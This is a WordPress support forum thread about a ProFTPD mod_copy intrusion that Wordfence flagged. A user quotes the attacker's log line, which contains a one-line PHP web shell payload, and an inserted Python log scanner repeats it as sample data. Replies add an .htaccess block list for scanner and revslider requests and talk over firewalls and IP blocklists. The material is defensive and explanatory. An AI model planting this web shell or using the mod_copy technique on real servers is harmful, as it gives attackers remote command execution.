• ninjaunmatched

    (@ninjaunmatched)


    Wordfence reported a malicious file that I see gets around.

    I have a Linux server set up and the vulnerability is in FTP, in this case ProFTPD. They were able to place a file called d.php that had this script in it.

    proftpd: 45.33.17.183:40652: SITE cpto /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>

    I was not able to login this morning and had to change passwords.

    https://wordpress.org/plugins/wordfence/
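    The log line quoted above is what a ProFTPD mod_copy abuse looks like from the defender's side: a SITE CPFR/CPTO pair that copies a path containing PHP into the web root. As an added example that is not part of this thread, the script below scans constructed ProFTPD-style log lines (same shape as the quoted one; the web root path /var/www and the other addresses are assumptions) and reports which connections used mod_copy, carried a PHP tag in the path, or wrote a .php file under the web root, so the offending IPs can be fed to the server firewall.

```python
import re

# Constructed sample log lines (not from a real server). The first mirrors the
# line quoted in the post above; the rest are invented benign and suspicious traffic.
SAMPLE_LOG = """\
proftpd: 45.33.17.183:40652: SITE cpto /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>
proftpd: 198.51.100.7:51022: SITE cpfr /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>
proftpd: 198.51.100.7:51022: SITE cpto /var/www/html/d.php
proftpd: 203.0.113.9:40010: USER alice
proftpd: 203.0.113.9:40010: STOR photos/holiday.jpg
"""

# "proftpd: <ip>:<port>: <COMMAND> <argument>"
LINE_RE = re.compile(
    r"^proftpd:\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+):\s+"
    r"(?P<cmd>\S+)(?:\s+(?P<arg>.*))?$"
)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)   # <?php, <?=, or bare <?
WEBROOT_PHP_RE = re.compile(r"^/var/www/.*\.php$", re.IGNORECASE)  # assumed web root


def classify(cmd, arg):
    """Return a list of finding labels for one FTP command (empty if benign)."""
    findings = []
    if cmd.upper() != "SITE" or not arg:
        return findings
    sub, _, path = arg.partition(" ")
    sub = sub.upper()
    if sub in ("CPFR", "CPTO"):               # mod_copy commands; rarely legitimate
        findings.append(f"mod_copy {sub}")
        if PHP_TAG_RE.search(path):
            findings.append("php tag in path")
        if sub == "CPTO" and WEBROOT_PHP_RE.match(path):
            findings.append("php file written under webroot")
    return findings


def scan_proftpd_log(text):
    """Parse log text and return one alert dict per suspicious line."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                          # not a proftpd command line; skip
        findings = classify(m["cmd"], m["arg"] or "")
        if findings:
            alerts.append({"ip": m["ip"], "port": int(m["port"]),
                           "line": line, "findings": findings})
    return alerts


def ips_to_block(alerts):
    """Distinct source IPs from the alerts, sorted, ready for a firewall deny list."""
    return sorted({a["ip"] for a in alerts})


if __name__ == "__main__":
    for a in scan_proftpd_log(SAMPLE_LOG):
        print(a["ip"], "->", ", ".join(a["findings"]))
    print("block:", ips_to_block(scan_proftpd_log(SAMPLE_LOG)))
```

    Any SITE CPFR/CPTO use is worth alerting on; if mod_copy is not needed, disabling it in the ProFTPD configuration removes the vector entirely.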

Viewing 8 replies - 1 through 8 (of 8 total)
  • mountainguy2

    (@mountainguy2)

    Good to be clear that Wordfence does NOT defend against malicious attacks on FTP and SSH logins, and subsequent possible intrusions. Server firewall is where this happens, nothing to do with Wordfence.

    Nice the Wordfence scan found the bad file, but too bad it got in there in the first place.

    Are you using a server firewall? I’m using CSF but I’m not very good at setting it up, and my “Managed WordPress Hosting” just had it at all default settings, most of which do little to nothing.

    Interesting to see the IP you reported is on at least one blocklist, too bad your server wasn’t able to block it…

    http://www.tcpiputils.com/browse/ip-address/45.33.17.183

    Jungle out there and we are in the food chain.

    MTN

    mountainguy2

    (@mountainguy2)

    Wordfence does nothing to defend against server FTP and SSH compromises, unfortunately. Server firewall for that. MTN

    Thread Starter ninjaunmatched

    (@ninjaunmatched)

    Yeah, I added a block of the IP address to the firewall… It’s a straight command line server. I did not want to add a GUI just yet. I did report it today though to the IP address nameservers (linode.com). I checked the block list before though and it was not on the block list, so they may have done that today… idk…. I checked again just now and it was blocked by 2 servers, but that is it.

    I am just gonna keep FTP turned off until I need to use it. I don’t really need it for anything else. I changed the FTP user password also just to be sure….

    I also read the news from Wordfence about the vulnerability in Revolution Slider. Crazy, right? I’m gonna check WordPress now if anything is storing passwords in plain text.

    mountainguy2

    (@mountainguy2)

    I’ve been running the following in my .htaccess file for a while, too bad those guys at that law firm were not doing so. I pity their IT people, I hope they’re not wearing cement boots.

    # BLOCK ENDLESS SCANS
    <IfModule mod_rewrite.c>
    # Known scanner targets in the request path or query string (dot escaped so
    # it matches a literal "." rather than any character); [OR] chains the conditions
    RewriteCond %{REQUEST_URI} (mssqlil|register)\.php [NC,OR]
    RewriteCond %{REQUEST_URI} (img|thumb|thumb_editor|thumbopen)\.php [NC,OR]
    RewriteCond %{QUERY_STRING} (img|thumb|thumb_editor|thumbopen)\.php [NC,OR]
    RewriteCond %{REQUEST_URI} revslider [NC,OR]
    RewriteCond %{QUERY_STRING} revslider [NC]
    # "-" (a plain hyphen) keeps the URI unchanged; [F] answers 403 Forbidden
    RewriteRule .* - [F,L]
    </IfModule>

    mountainguy2

    (@mountainguy2)

    I compare the blocklists quite a bit to what Wordfence lets slip through their “Real Time Security Network.” Quite a few misses and the Spamhaus lists seem to be some of the best, and show the bad IP before the other guys. I’ve said it before and will say it again, it appears Wordfence should pay to concatenate at least one of those big blocklists into their “Real-Time WordPress Security Network.” This would be a great thing for the paid version of Wordfence, it would eliminate work on the part of us webmasters who have to manually deal with this stuff.

    Beyond that, the question is, should I enable the use of blocklist in the server firewall, CSF? My site has a lot of traffic and does not have a robust server due to budget constraints, I’m afraid of what CSF will do to my site load time if it’s looking at huge block lists for every request. What is more, the amount of redundancy this creates (Wordfence vs CSF) seems antithetical to good server/website management.

    MTN

    Thread Starter ninjaunmatched

    (@ninjaunmatched)

    You monitor blocklists….

    I have an idea for you to try out. A Chrome extension I use to monitor changes to webpages. It is called Visualping, I think. I use it now to notify me whenever a change happens on a certain SamMobile.com page (firmware for my phone). It catches some non-relevant changes, but I always know when they put a newer firmware up.

    Thread Starter ninjaunmatched

    (@ninjaunmatched)

    Oh, I just noticed they added a feature where you can pick elements of a page to monitor for a change…. That will eliminate the non-relevant changes it picked up before… changing my settings now.

    Thread Starter ninjaunmatched

    (@ninjaunmatched)

    Hmmmmm, they updated it, but you can still get the old version. It is called Page Monitor.

  • The topic ‘WARNING!!! from IP 45.33.17.183’ is closed to new replies.